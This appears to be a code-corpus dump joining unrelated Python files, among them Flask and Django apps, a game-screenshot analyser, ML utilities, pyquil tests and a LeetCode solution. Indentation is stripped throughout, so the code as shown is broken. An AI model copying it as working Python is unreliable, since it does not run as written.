self.DEFAULT_LOCATION_CONTENT_TYPE_MAPPING[
param['in']]
)
request_body['content'] = {content_type: fields}
operation['requestBody'] = request_body
# There can be only one requestBody
operation['parameters'].remove(param)
if not operation['parameters']:
del operation['parameters']
break
@staticmethod
def doc(**kwargs):
"""Decorator adding description attributes to a view function
Values passed as kwargs are copied verbatim in the docs
Example: ::
@blp.doc(description="Return pets based on ID",
summary="Find pets by ID"
)
def get(...):
...
"""
def decorator(func):
@wraps(func)
def wrapper(*f_args, **f_kwargs):
return func(*f_args, **f_kwargs)
# Don't merge manual doc with auto-documentation right now.
# Store it in a separate attribute to merge it later.
# The deepcopy avoids modifying the wrapped function doc
wrapper._api_manual_doc = deepupdate(
deepcopy(getattr(wrapper, '_api_manual_doc', {})), kwargs)
return wrapper
return decorator
| StarcoderdataPython |
1972365 | <reponame>qianhk/FeiPython
#!/usr/bin/env python3
# coding=utf-8
from PIL import Image, ImageDraw
import os
import time
import math
under_game_score_y = 200
piece_base_height_1_2 = 13
piece_body_width = 49
def find_piece_and_board(im):
w, h = im.size
print("size: {}, {}".format(w, h))
piece_x_sum = piece_x_c = piece_y_max = 0
board_x = board_y = 0
scan_x_border = int(w / 8) # 扫描棋子时的左右边界
scan_start_y = 0 # 扫描的起始 y 坐标
im_pixel = im.load()
# 以 50px 步长,尝试探测 scan_start_y
for i in range(under_game_score_y, h, 50):
last_pixel = im_pixel[0, i]
for j in range(1, w):
pixel = im_pixel[j, i]
# 不是纯色的线,则记录scan_start_y的值,准备跳出循环
if pixel != last_pixel:
scan_start_y = i - 50
break
if scan_start_y:
break
print("scan_start_y: ", scan_start_y)
# 从 scan_start_y 开始往下扫描,棋子应位于屏幕上半部分,这里暂定不超过 2/3
for i in range(scan_start_y, int(h * 2 / 3)):
# 横坐标方面也减少了一部分扫描开销
for j in range(scan_x_border, w - scan_x_border):
pixel = im_pixel[j, i]
# 根据棋子的最低行的颜色判断,找最后一行那些点的平均值,这个颜
# 色这样应该 OK,暂时不提出来
if (50 < pixel[0] < 60) \
and (53 < pixel[1] < 63) \
and (95 < pixel[2] < 110):
piece_x_sum += j
piece_x_c += 1
piece_y_max = max(i, piece_y_max)
im.putpixel([j, i], (255, 0, 0))
if not all((piece_x_sum, piece_x_c)):
return 0, 0, 0, 0
piece_x = piece_x_sum / piece_x_c
piece_y = piece_y_max - piece_base_height_1_2 # 上移棋子底盘高度的一半
for i in range(int(h / 3), int(h * 2 / 3)):
last_pixel = im_pixel[0, i]
if board_x or board_y:
break
board_x_sum = 0
board_x_c = 0
for j in range(w):
pixel = im_pixel[j, i]
# 修掉脑袋比下一个小格子还高的情况的 bug
if abs(j - piece_x) < piece_body_width:
continue
# 修掉圆顶的时候一条线导致的小 bug,这个颜色判断应该 OK,暂时不提出来
if abs(pixel[0] - last_pixel[0]) \
+ abs(pixel[1] - last_pixel[1]) \
+ abs(pixel[2] - last_pixel[2]) > 10:
board_x_sum += j
board_x_c += 1
if board_x_sum:
board_x = board_x_sum / board_x_c
# 按实际的角度来算,找到接近下一个 board 中心的坐标 这里的角度应该
# 是 30°,值应该是 tan 30°, math.sqrt(3) / 3
board_y = piece_y - abs(board_x - piece_x) * math.sqrt(3) / 3
if not all((board_x, board_y)):
return 0, 0, 0, 0
return piece_x, piece_y, board_x, board_y
def save_debug_screenshot(oriFileName, im, piece_x, piece_y, board_x, board_y):
# draw = ImageDraw.Draw(im)
# draw.line((piece_x, piece_y) + (board_x, board_y), fill=2, width=3)
# draw.line((piece_x, 0, piece_x, im.size[1]), fill=(255, 0, 0))
# draw.line((0, piece_y, im.size[0], piece_y), fill=(255, 0, 0))
# draw.line((board_x, 0, board_x, im.size[1]), fill=(0, 0, 255))
# draw.line((0, board_y, im.size[0], board_y), fill=(0, 0, 255))
# draw.ellipse((piece_x - 10, piece_y - 10, piece_x + 10, piece_y + 10), fill=(255, 0, 0))
# draw.ellipse((board_x - 10, board_y - 10, board_x + 10, board_y + 10), fill=(0, 0, 255))
# del draw
splitTexts = os.path.splitext(oriFileName)
im.save('{}_debug{}'.format(splitTexts[0], splitTexts[1]))
def main():
oriFileName = "./jump_1.png"
im = Image.open(oriFileName)
# 获取棋子和 board 的位置
piece_x, piece_y, board_x, board_y = find_piece_and_board(im)
ts = int(time.time())
print(ts, piece_x, piece_y, board_x, board_y)
if piece_x == 0:
return
save_debug_screenshot(oriFileName, im, piece_x, piece_y, board_x, board_y)
if __name__ == '__main__':
main()
| StarcoderdataPython |
5184448 | from dataset_walker import DatasetWalker
import sys
import json
import argparse
slot_keys = [
("restaurant", "book", "people"),
("restaurant", "book", "day"),
("restaurant", "book", "time"),
("restaurant", "semi", "food"),
("restaurant", "semi", "pricerange"),
("restaurant", "semi", "name"),
("restaurant", "semi", "area"),
("hotel", "book", "people"),
("hotel", "book", "rooms"),
("hotel", "book", "day"),
("hotel", "book", "stay"),
("hotel", "semi", "name"),
("hotel", "semi", "area"),
("hotel", "semi", "pricerange"),
("hotel", "semi", "stars"),
("hotel", "semi", "type"),
("attraction", "semi", "type"),
("attraction", "semi", "name"),
("attraction", "semi", "area")
]
normalize_dict = {"one": "1", "two": "2", "three": "3", "four": "4", "five": "5", "six": "6",
"seven": "7", "eight": "8", "nine": "9"}
class Metric:
def __init__(self):
self.reset()
def reset(self):
self._total_num_instances = 0.0
self._joint_goal_matched = 0.0
self._total_num_slots = 0.0
self._num_slots_matched = 0.0
self._ref_slots_with_values = 0.0
self._ref_slots_with_none = 0.0
self._pred_slots_with_values = 0.0
self._pred_slots_with_none = 0.0
self._value_match_score = 0.0
self._none_match_score = 0.0
def _normalize_value(self, value):
normalized = value.lower()
if normalized in normalize_dict:
normalized = normalize_dict[normalized]
return normalized
def _match_value(self, ref, pred):
ref = self._normalize_value(ref)
pred = self._normalize_value(pred)
if ref == pred:
result = True
else:
result = False
return result
def update(self, ref_obj, pred_obj):
joint_goal_flag = True
for key1, key2, key3 in slot_keys:
self._total_num_slots += 1
if key1 in ref_obj and key2 in ref_obj[key1] and key3 in ref_obj[key1][key2]:
ref_val = list(set(ref_obj[key1][key2][key3]))
else:
ref_val = None
if key1 in pred_obj and key2 in pred_obj[key1] and key3 in pred_obj[key1][key2]:
pred_val = list(set(pred_obj[key1][key2][key3]))
else:
pred_val = None
if ref_val is None and pred_val is None:
self._ref_slots_with_none += 1
self._pred_slots_with_none += 1
self._none_match_score += 1
self._num_slots_matched += 1
elif ref_val is None and pred_val is not None:
self._ref_slots_with_none += 1
self._pred_slots_with_values += 1
joint_goal_flag = False
elif ref_val is not None and pred_val is None:
self._ref_slots_with_values += 1
self._pred_slots_with_none += 1
joint_goal_flag = False
else:
self._ref_slots_with_values += 1
self._pred_slots_with_values += 1
num_matched_values = 0.0
for r in ref_val:
for p in pred_val:
if self._match_value(r, p):
num_matched_values += 1
if num_matched_values > 0.0:
prec_values = num_matched_values/len(pred_val)
rec_values = num_matched_values/len(ref_val)
f1_values = 2*prec_values*rec_values/(prec_values+rec_values)
else:
f1_values = 0.0
self._value_match_score += f1_values
if f1_values == 1.0:
self._num_slots_matched += 1
else:
joint_goal_flag = False
if joint_goal_flag is True:
self._joint_goal_matched += 1
self._total_num_instances += 1
def scores(self):
jga = self._joint_goal_matched / self._total_num_instances
slot_accuracy = self._num_slots_matched / self._total_num_slots
if self._pred_slots_with_values > 0:
slot_value_p = self._value_match_score / self._pred_slots_with_values
else:
slot_value_p = 0.0
if self._ref_slots_with_values > 0:
slot_value_r = self._value_match_score / self._ref_slots_with_values
else:
slot_value_r = 0.0
if (slot_value_p + slot_value_r) > 0.0:
slot_value_f = 2 * slot_value_p * slot_value_r / (slot_value_p + slot_value_r)
else:
slot_value_f = 0.0
if self._pred_slots_with_none > 0:
slot_none_p = self._none_match_score / self._pred_slots_with_none
else:
slot_none_p = 0.0
if self._ref_slots_with_none > 0:
slot_none_r = self._none_match_score / self._ref_slots_with_none
else:
slot_none_r = 0.0
if (slot_none_p + slot_none_r) > 0.0:
slot_none_f = 2 * slot_none_p * slot_none_r / (slot_none_p + slot_none_r)
else:
slot_none_f = 0.0
scores = {
'joint_goal_accuracy': jga,
'slot': {
'accuracy': slot_accuracy,
'value_prediction': {
'prec': slot_value_p,
'rec': slot_value_r,
'f1': slot_value_f
},
'none_prediction': {
'prec': slot_none_p,
'rec': slot_none_r,
'f1': slot_none_f
}
}
}
return scores
def main(argv):
parser = argparse.ArgumentParser(description='Evaluate the system outputs.')
parser.add_argument('--dataset', dest='dataset', action='store', metavar='DATASET', choices=['train', 'val', 'test'], required=True, help='The dataset to analyze')
parser.add_argument('--dataroot',dest='dataroot',action='store', metavar='PATH', required=True,
help='Will look for corpus in <dataroot>/<dataset>/...')
parser.add_argument('--outfile',dest='outfile',action='store',metavar='JSON_FILE',required=True,
help='File containing output JSON')
parser.add_argument('--scorefile',dest='scorefile',action='store',metavar='JSON_FILE',required=True,
help='File containing scores')
args = parser.parse_args()
with open(args.outfile, 'r') as f:
output = json.load(f)
data = DatasetWalker(dataroot=args.dataroot, dataset=args.dataset, labels=True)
metric = Metric()
for (instance, ref), pred in zip(data, output):
metric.update(ref, pred)
scores = metric.scores()
with open(args.scorefile, 'w') as out:
json.dump(scores, out, indent=2)
if __name__ =="__main__":
main(sys.argv)
| StarcoderdataPython |
3581555 | import os
import tensorflow as tf
from tensorflow.python.tools.inspect_checkpoint import print_tensors_in_checkpoint_file
def jaccard_distance(text1, text2):
""" Measure the jaccard distance of two different text.
ARGS:
text1,2: list of tokens
RETURN:
score(float): distance between two text
"""
intersection = set(text1).intersection(set(text2))
union = set(text1).union(set(text2))
return 1 - len(intersection) / len(union)
def load_ckpt(args, saver, sess, ckpt_dir='train', ckpt_id=None):
while True:
if ckpt_id is None or ckpt_id == -1:
ckpt_dir = os.path.join(args.model_path, ckpt_dir)
ckpt_state = tf.train.get_checkpoint_state(ckpt_dir, latest_filename=None)
print(ckpt_dir)
ckpt_path = ckpt_state.model_checkpoint_path
print("CKPT_PATH: {}".format(ckpt_path))
# print_tensors_in_checkpoint_file(file_name=ckpt_path, tensor_name='', all_tensors=False)
saver.restore(sess, ckpt_path)
return ckpt_path
def gpu_config():
config = tf.ConfigProto(allow_soft_placement=True)
config.gpu_options.allow_growth = True
return config
def assign_specific_gpu(gpu_nums='-1'):
assert gpu_nums is not None and gpu_nums != '-1'
os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'
os.environ['CUDA_VISIBLE_DEVICES'] = gpu_nums
class Vocab():
def __init__(self, path='data/vocab.txt'):
self.word2id, self.id2word = {}, {}
self.vocabpath = path
self.read_voca()
def read_voca(self):
assert os.path.exists(self.vocabpath)
with open(self.vocabpath, 'r', encoding='utf8') as f:
ls = [line.strip() for line in f.readlines()]
for idx, word in enumerate(ls):
self.word2id[word] = idx
self.id2word[idx] = word
self.unk_id = self.word2id['<UNK>']
self.beg_id = self.word2id['<BEG>']
self.eos_id = self.word2id['<EOS>']
self.pad_id = self.word2id['<PAD>']
self.words = list(self.word2id.keys())
self.word_sorted = ls
def text2ids(self, toks):
assert isinstance(toks, list) and all([isinstance(tok, str) for tok in toks])
ids = [self.word2id[tok] if tok in self.word2id else self.unk_id for tok in toks]
return ids
def get_pretrain_weights(path):
""" Load pretrain weights and save """
with tf.Session(config=gpu_config()) as sess:
ckpt_name = tf.train.latest_checkpoint(path)
meta_name = ckpt_name + '.meta'
save_graph = tf.train.import_meta_graph(meta_name)
save_graph.restore(sess, ckpt_name)
var_name_list = [var.name for var in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)]
vardict = dict()
for var in var_name_list:
vardict[var] = sess.run(tf.get_default_graph().get_tensor_by_name(var))
tf.reset_default_graph()
return vardict
def print_config(args):
print('mode: {}'.format(args.mode))
print('model: {}'.format(args.model))
print("use pretrain: {}".format(args.use_pretrain))
print("Batch size: {}".format(args.batch_size))
def assign_pretrain_weights(pretrain_vardicts):
assign_op, uninitialized_varlist = [], []
all_variables = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
assign_op_names = []
for var in all_variables:
varname = var.name
new_model_var = tf.get_default_graph().get_tensor_by_name(varname)
if 'bw_model' in varname: varname = varname.replace('bw_model', 'models')
if varname in pretrain_vardicts:
assign_op.append(tf.assign(new_model_var, pretrain_vardicts[varname]))
assign_op_names.append(varname)
else:
if varname.replace('models/decoder/attention_decoder', 'models/decoder/rnn') in pretrain_vardicts:
corres_varname = varname.replace('models/decoder/attention_decoder', 'models/decoder/rnn')
assign_op.append(tf.assign(new_model_var, pretrain_vardicts[corres_varname]))
assign_op_names.append(varname)
elif varname.replace('models/tgt_encoder/', 'models/encoder/') in pretrain_vardicts:
corres_varname = varname.replace('models/tgt_encoder/', 'models/encoder/')
assign_op.append(tf.assign(new_model_var, pretrain_vardicts[corres_varname]))
assign_op_names.append(varname)
elif ('/encoder/' in varname or '/decoder/' in varname) and ('kernel:0' in varname or 'bias:0' in varname):
raise ValueError("{} should be pretrained.".format(varname))
else:
uninitialized_varlist.append(var)
return assign_op, uninitialized_varlist
def ids2tokens(ids, vocab):
toks = [vocab.id2word[id_] for id_ in ids if id_ not in [vocab.pad_id, vocab.eos_id]]
return toks
def sample_gumbel(shape, eps=1e-10):
"""Sample from Gumbel(0, 1)"""
U = tf.random_uniform(shape, minval=0.0, maxval=1.0)
tf.stop_gradient(U)
return -tf.log(-tf.log(U + eps) + eps)
def gumbel_softmax_sample(logits, temp):
""" Draw a sample from the Gumbel-Softmax distribution"""
y = logits + sample_gumbel(tf.shape(logits))
return tf.nn.softmax(y / temp)
def gumbel_softmax(logits, temp, hard=False):
"""Sample from the Gumbel-Softmax distribution and optionally discretize.
Args:
logits: [batch_size, n_class] unnormalized log-probs
temperature: non-negative scalar
hard: if True, take argmax, but differentiate w.r.t. soft sample y
Returns:
[batch_size, n_class] sample from the Gumbel-Softmax distribution.
If hard=True, then the returned sample will be one-hot, otherwise it will
be a probabilitiy distribution that sums to 1 across classes
"""
y = gumbel_softmax_sample(logits, temp)
if hard:
k = tf.shape(logits)[-1]
#y_hard = tf.cast(tf.one_hot(tf.argmax(y,1),k), y.dtype)
y_hard = tf.cast(tf.equal(y, tf.reduce_max(y, 1, keep_dims=True)), y.dtype)
y = tf.stop_gradient(y_hard - y) + y
return y
| StarcoderdataPython |
12823540 | #!/usr/bin/env python
import os
from setuptools import setup, find_packages
sdict = dict(
name = 'django-govuk-template',
packages = find_packages(),
version = '0.16.0',
description = 'Django packaged version of the GOV.UK template',
long_description = 'A base template for Government Digital Services',
url = 'https://github.com/alphagov/govuk_template',
author = 'Government Digital Service developers (https://gds.blog.gov.uk/)',
author_email = '<EMAIL>',
maintainer = '<NAME>',
maintainer_email = '<EMAIL>',
keywords = ['python', 'django', 'alphagov', 'govuk'],
license = 'MIT',
include_package_data = True,
install_requires = [
'django>=1.3'
],
platforms=["any"],
classifiers=[
'Programming Language :: Python',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries :: Python Modules',
]
)
from distutils.core import setup
setup(**sdict)
| StarcoderdataPython |
12819951 | <filename>dcs_kneeboard_creator/widgets/scene.py
import sys
import logging
logging.basicConfig(level=logging.INFO)
from PySide6.QtWidgets import *
from PySide6.QtGui import *
from PySide6.QtCore import *
import ez_utils.general as utils
import ez_utils.io_utils as io_utils
from ..graphics.waypoint import Waypoint
class BoardScene(QGraphicsScene):
def __init__(self):
super().__init__()
self.setBackgroundBrush(QColor(20, 20, 20))
self.setSceneRect(0, 0, 768, 1024)
self.TEST_DELETEME()
self.add_boundary()
def TEST_DELETEME(self):
test = QGraphicsRectItem(0, 0, 50, 60)
test.setBrush(QBrush(QColor(255, 0, 255)))
test.setFlag(QGraphicsRectItem.ItemIsSelectable)
test.setFlag(QGraphicsRectItem.ItemIsMovable)
test.setFlag(QGraphicsRectItem.ItemSendsGeometryChanges)
test2 = QGraphicsRectItem(0, 60, 50, 60)
test2.setBrush(QBrush(QColor(255, 0, 0)))
test2.setFlag(QGraphicsRectItem.ItemIsSelectable)
test2.setFlag(QGraphicsRectItem.ItemIsMovable)
test2.setFlag(QGraphicsRectItem.ItemSendsGeometryChanges)
self.addItem(test)
self.addItem(test2)
waypoint = Waypoint(200, 400)
self.addItem(waypoint)
def add_boundary(self):
self.boundary = QGraphicsRectItem(0, 0, 768, 1024)
self.boundary.setPen(QPen(QColor(0, 0, 0)))
self.boundary.setZValue(10000)
self.addItem(self.boundary)
def render_scene(self):
self.setSceneRect(0, 0, 768, 1024)
image = QImage(self.sceneRect().size().toSize(), QImage.Format_ARGB32)
image.fill(Qt.transparent)
painter = QPainter(image)
self.render(painter)
image.save(r"D:/test_image.png")
painter.end()
def dragMoveEvent(self, event):
event.accept()
# def dropEvent(self, event):
# try:
# class_name = event.source().selectedItems()[0].file_name_no_ext
# module = event.source().selectedItems()[0].folder_name
#
# x = event.scenePos().x()
# y = event.scenePos().y()
#
# dropped_node = self.add_node_to_view(class_name, module, x, y)
# except Exception as err:
# utils.trace(err)
def keyPressEvent(self, event):
if event.key() == Qt.Key_R and event.modifiers() == Qt.ControlModifier:
print("rendering")
self.render_scene()
# self.delete_nodes()
| StarcoderdataPython |
1870308 | # Generated by Django 3.0.4 on 2020-04-19 20:22
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('auth', '0011_update_proxy_permissions'),
('YourJobAidApi', '0023_userprofile_bio'),
]
operations = [
migrations.AddField(
model_name='userprofile',
name='group',
field=models.ForeignKey(default=2, on_delete=django.db.models.deletion.CASCADE, related_name='role', to='auth.Group'),
preserve_default=False,
),
]
| StarcoderdataPython |
3373889 | ##############################################################################
# Copyright 2016-2021 Rigetti Computing
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
import json
import time
from typing import Any, Dict
import httpx
from pytest_httpx import HTTPXMock, to_response
from qcs_api_client.client import QCSClientConfiguration
from pyquil.api._qvm_client import (
QVMClient,
GetWavefunctionResponse,
GetWavefunctionRequest,
MeasureExpectationResponse,
MeasureExpectationRequest,
RunAndMeasureProgramResponse,
RunAndMeasureProgramRequest,
RunProgramRequest,
RunProgramResponse,
)
def test_init__sets_base_url_and_timeout(client_configuration: QCSClientConfiguration):
qvm_client = QVMClient(client_configuration=client_configuration, request_timeout=3.14)
assert qvm_client.base_url == client_configuration.profile.applications.pyquil.qvm_url
assert qvm_client.timeout == 3.14
def test_sets_timeout_on_requests(client_configuration: QCSClientConfiguration, httpx_mock: HTTPXMock):
qvm_client = QVMClient(client_configuration=client_configuration, request_timeout=0.1)
def assert_timeout(request: httpx.Request, ext: Dict[str, Any]):
assert ext["timeout"] == httpx.Timeout(qvm_client.timeout).as_dict()
return to_response(data="1.2.3 [abc123]")
httpx_mock.add_callback(assert_timeout)
qvm_client.get_version()
def test_get_version__returns_version(client_configuration: QCSClientConfiguration, httpx_mock: HTTPXMock):
qvm_client = QVMClient(client_configuration=client_configuration)
httpx_mock.add_response(
url=client_configuration.profile.applications.pyquil.qvm_url,
match_content=json.dumps({"type": "version"}).encode(),
data="1.2.3 [abc123]",
)
assert qvm_client.get_version() == "1.2.3"
def test_run_program__returns_results(client_configuration: QCSClientConfiguration, httpx_mock: HTTPXMock):
qvm_client = QVMClient(client_configuration=client_configuration)
httpx_mock.add_response(
url=client_configuration.profile.applications.pyquil.qvm_url,
match_content=json.dumps(
{
"type": "multishot",
"compiled-quil": "some-program",
"addresses": {"ro": True},
"trials": 1,
"measurement-noise": (3.14, 1.61, 6.28),
"gate-noise": (1.0, 2.0, 3.0),
"rng-seed": 314,
},
).encode(),
json={"ro": [[1, 0, 1]]},
)
request = RunProgramRequest(
program="some-program",
addresses={"ro": True},
trials=1,
measurement_noise=(3.14, 1.61, 6.28),
gate_noise=(1.0, 2.0, 3.0),
seed=314,
)
assert qvm_client.run_program(request) == RunProgramResponse(results={"ro": [[1, 0, 1]]})
def test_run_and_measure_program__returns_results(client_configuration: QCSClientConfiguration, httpx_mock: HTTPXMock):
qvm_client = QVMClient(client_configuration=client_configuration)
httpx_mock.add_response(
url=client_configuration.profile.applications.pyquil.qvm_url,
match_content=json.dumps(
{
"type": "multishot-measure",
"compiled-quil": "some-program",
"qubits": [0, 1, 2],
"trials": 1,
"measurement-noise": (3.14, 1.61, 6.28),
"gate-noise": (1.0, 2.0, 3.0),
"rng-seed": 314,
},
).encode(),
json=[[1, 0, 1]],
)
request = RunAndMeasureProgramRequest(
program="some-program",
qubits=[0, 1, 2],
trials=1,
measurement_noise=(3.14, 1.61, 6.28),
gate_noise=(1.0, 2.0, 3.0),
seed=314,
)
assert qvm_client.run_and_measure_program(request) == RunAndMeasureProgramResponse(results=[[1, 0, 1]])
def test_measure_expectation__returns_expectation(client_configuration: QCSClientConfiguration, httpx_mock: HTTPXMock):
qvm_client = QVMClient(client_configuration=client_configuration)
httpx_mock.add_response(
url=client_configuration.profile.applications.pyquil.qvm_url,
match_content=json.dumps(
{
"type": "expectation",
"state-preparation": "some-program",
"operators": ["some-op-program"],
"rng-seed": 314,
},
).encode(),
json=[0.161],
)
request = MeasureExpectationRequest(
prep_program="some-program",
pauli_operators=["some-op-program"],
seed=314,
)
assert qvm_client.measure_expectation(request) == MeasureExpectationResponse(expectations=[0.161])
def test_get_wavefunction__returns_wavefunction(client_configuration: QCSClientConfiguration, httpx_mock: HTTPXMock):
qvm_client = QVMClient(client_configuration=client_configuration)
httpx_mock.add_response(
url=client_configuration.profile.applications.pyquil.qvm_url,
match_content=json.dumps(
{
"type": "wavefunction",
"compiled-quil": "some-program",
"measurement-noise": (3.14, 1.61, 6.28),
"gate-noise": (1.0, 2.0, 3.0),
"rng-seed": 314,
},
).encode(),
data=b"some-wavefunction",
)
request = GetWavefunctionRequest(
program="some-program",
measurement_noise=(3.14, 1.61, 6.28),
gate_noise=(1.0, 2.0, 3.0),
seed=314,
)
assert qvm_client.get_wavefunction(request) == GetWavefunctionResponse(wavefunction=b"some-wavefunction")
| StarcoderdataPython |
9673928 | __source__ = 'https://leetcode.com/problems/continuous-subarray-sum/'
# Time: O(n^2)
# Space: O(n)
#
# Description: Leetcode # 523. Continuous Subarray Sum
#
# Given a list of non-negative numbers and a target integer k, write a function to check if
# the array has a continuous subarray of size at least 2 that sums up to the multiple of k,
# that is, sums up to n*k where n is also an integer.
# Example 1:
# Input: [23, 2, 4, 6, 7], k=6
# Output: True
# Explanation: Because [2, 4] is a continuous subarray of size 2 and sums up to 6.
# Example 2:
# Input: [23, 2, 6, 4, 7], k=6
# Output: True
# Explanation: Because [23, 2, 6, 4, 7] is an continuous subarray of size 5 and sums up to 42.
# Note:
# The length of the array won't exceed 10,000.
# You may assume the sum of all the numbers is in the range of a signed 32-bit integer.
# Hide Company Tags Facebook
# Hide Tags Dynamic Programming Math
# Hide Similar Problems (M) Subarray Sum Equals K
#
# explanation =
# if k == 0
# If there are two continuous zeros in nums, return True
# Time O(n).
#
# if n >= 2k and k > 0
# There will be at least three numbers in sum with the same remainder divided by k. So I can return True without any extra calculation.
# Time O(1).
#
# if n < 2k and k > 0
# If I can find two numbers in sum with the same remainder divided by k
# and the distance of them is greater than or equal to 2, return True.
# Time O(n) <= O(k).
#
# k < 0
# same as k > 0.
#
class Solution(object):
def checkSubarraySum(self, nums, k):
if k == 0:
# if two continuous zeros in nums, return True
# time O(n)
for i in range(0, len(nums) - 1):
if nums[i] == 0 and nums[i+1] == 0:
return True
return False
k = abs(k)
if len(nums) >= k * 2:
return True
#if n >= 2k: return True
#if n < 2k: time O(n) is O(k)
sum = [0]
for x in nums:
sum.append((sum[-1] + x) % k)
Dict = {}
for i in range(0, len(sum)):
if Dict.has_key(sum[i]):
if i - Dict[sum[i]] > 1:
return True
else:
Dict[sum[i]] = i
return False
Java = '''
# Thought: https://leetcode.com/problems/continuous-subarray-sum/solution/
# Approach #2 Better Brute Force [Accepted]
# Time complexity : O(n^2). Two for loops are used for considering every subarray possible.
# Space complexity : O(n). sumsum array of size nn is used.
# 50ms 22.98%
class Solution {
public boolean checkSubarraySum(int[] nums, int k) {
int[] sums = new int[nums.length];
sums[0] = nums[0];
for (int i = 1; i < nums.length; i++) sums[i] = sums[i - 1] + nums[i];
for (int i = 0; i < nums.length - 1; i++) {
for (int j = i + 1; j < nums.length; j++) {
int ttl = sums[j] - sums[i] + nums[i];
if ( ttl == k || (k != 0 && ttl % k == 0)) return true;
}
}
return false;
}
}
# Approach #3 Using HashMap [Accepted]
# Time complexity : O(n). Only one traversal of the array numsnums is done.
# Space complexity : O(min(n,k)). The HashMap can contain upto min(n,k)min(n,k) different pairings.
# whenever the same sum % k sum value is obtained corresponding to two indices i and j,
# it implies that sum of elements between those indices is an integer multiple of k.
# subArray sum i = k * m + (remainder); 1)
# subArray sum j = k * n + (remainder); 2)
# let 1 - 2) = k * (m - n)
# 9ms 44.20%
class Solution {
public boolean checkSubarraySum(int[] nums, int k) {
Map<Integer, Integer> map = new HashMap();
int sum = 0;
map.put(0, -1);
for (int i = 0; i < nums.length; i++) {
sum += nums[i];
if (k != 0) sum = sum % k;
if (map.get(sum) == null) map.put(sum, i);
else {
if (i - map.get(sum) > 1) { //considering [0, 0, 0] 0, at index 0, continue;
return true;
}
}
}
return false;
}
}
'''
| StarcoderdataPython |
11355261 | <filename>todo/__init__.py
import os
from flask import Flask
def create_app():
app = Flask(__name__)
app.config.from_mapping(
SECRET_KEY='mykey',
DATABASE_HOST=os.environ.get('FLASK_DATABASE_HOST'),
DATABASE=os.environ.get('FLASK_DATABASE'),
DATABASE_USER=os.environ.get('FLASK_DATABASE_USER'),
DATABASE_PASSWORD=os.environ.get('FLASK_DATABASE_PASSWORD')
)
from . import db
db.teardown_appcontext_closedb(app)
from . import auth
app.register_blueprint(auth.bp)
from . import todo
app.register_blueprint(todo.bp)
return app | StarcoderdataPython |
3444100 | <filename>src/test/test_tools.py
import sys
sys.path.append('../')
import unittest
from cog_abm.extras.tools import calc_auc
class TestAucCalculations(unittest.TestCase):
def setUp(self):
pass
def test_auc(self):
test_data = [
([(0, 0), (1, 2), (2, 0)], 2.),
([(0, 1), (1, 1)], 1),
([(0., 0.5), (1, 2), (2, 2.)], 1.25 + 2.)
]
for curve, expected_auc in test_data:
self.assertEqual(expected_auc, calc_auc(curve))
| StarcoderdataPython |
3301152 | from django.contrib import admin
# Register your models here.
from .models import tag_store, stat_store
admin.site.register(tag_store)
admin.site.register(stat_store) | StarcoderdataPython |
359717 | <filename>src/model_selection_monk_test.py
from utility import read_monk_dataset
from model_selection import grid_search, get_best_models
if __name__ == '__main__':
# read dataset
tr_ds_name = "monks-3.train"
ts_ds_name = "monks-3.test"
# grid search parameters
gs_params = {'units_per_layer': ([4, 1], [8, 1], [16, 1]),
'act_functions': (['relu', 'sigmoid'],),
'weights_init': ('glorot',),
'momentum': (0.8, 0.9),
'nesterov': (True,),
'batch_size': ('full',),
'lr': (0.76, 0.8),
'error_func': ('squared_error',),
'metr': ('binary_class_accuracy',),
'lambda_': (0.001, 0.0001, 0.005),
'reg_type': ('lasso', 'ridge_regression'),
'epochs': (500,)}
# coarse grid search. Results are saved on file
grid_search(dataset=tr_ds_name, params=gs_params, coarse=True)
_, best_params = get_best_models(dataset=tr_ds_name, coarse=True, n_models=5)
best_params = best_params[0]
for p,v in best_params.items():
print(p,v) | StarcoderdataPython |
6680540 | # -*- coding: utf-8 -*-
from annohub import app
from flask import flash, render_template, abort, redirect, url_for
#from flask import request, session
from annohub.lib.db import Db as DbImport
import annohub.lib.user as user
from annohub import login_manager
#from bson import DocumentTooLarge
# flash can take the following properties:
# bg-primary
# bg-success
# bg-info
# bg-warning
# bg-danger
import datetime
now = datetime.datetime.now()
@login_manager.user_loader
def load_user(name):
return user._get_by_name(name)
@login_manager.unauthorized_handler
def unauthorized():
flash('Please log in.', "bg-warning")
return redirect(url_for('auth.login'))
@app.errorhandler(404)
def page_not_found(e):
err = {
'code':404,
'message':"page not found",
'desc':"We are sorry, but the page you are looking for could not be found."
}
return render_template('error.html', err=err), err['code']
@app.errorhandler(403)
def page_not_allowed(e):
err = {
'code':403,
'message':"permission denied",
'desc':"Please authenticate yourself if you want to view this page."
}
return render_template('error.html', err=err), err['code']
@app.errorhandler(405)
def method_not_allowed(e):
err = {
'code':405,
'message':"method not allowed",
'desc':"The method you used is not allowed."
}
return render_template('error.html', err=err), err['code']
@app.errorhandler(500)
def internal_server_error(e):
err = {
'code':500,
'message':"internal server error",
'desc':"We are sorry, but the server has internal problems."
}
return render_template('error.html', err=err), err['code']
@app.route(app.config['RESET_DB_URL'])
def reset(secret_token=None):
if secret_token == app.config['SECRET_RESET_DB_TOKEN']:
this_dbi = DbImport()
this_dbi.reset()
flash('Reset was successfull.', 'bg-success')
return redirect(url_for('index'))
else:
abort(403)
@app.route(app.config['SETUP_DB_URL'])
def setup(secret_token=None):
if secret_token == app.config['SECRET_SETUP_DB_TOKEN']:
this_dbi = DbImport()
this_dbi.setup()
flash('Setup was successfull. Restart the application.', 'bg-warning')
return redirect(url_for('index'))
else:
abort(403)
@app.route(app.config['UPDATE_NLTK_URL'])
def update(secret_token=None):
if secret_token == app.config['SECRET_NLTK_TOKEN']:
this_dbi = DbImport()
this_dbi._nltk_setup()
flash('Update was successfull.', 'bg-success')
return redirect(url_for('index'))
else:
abort(403)
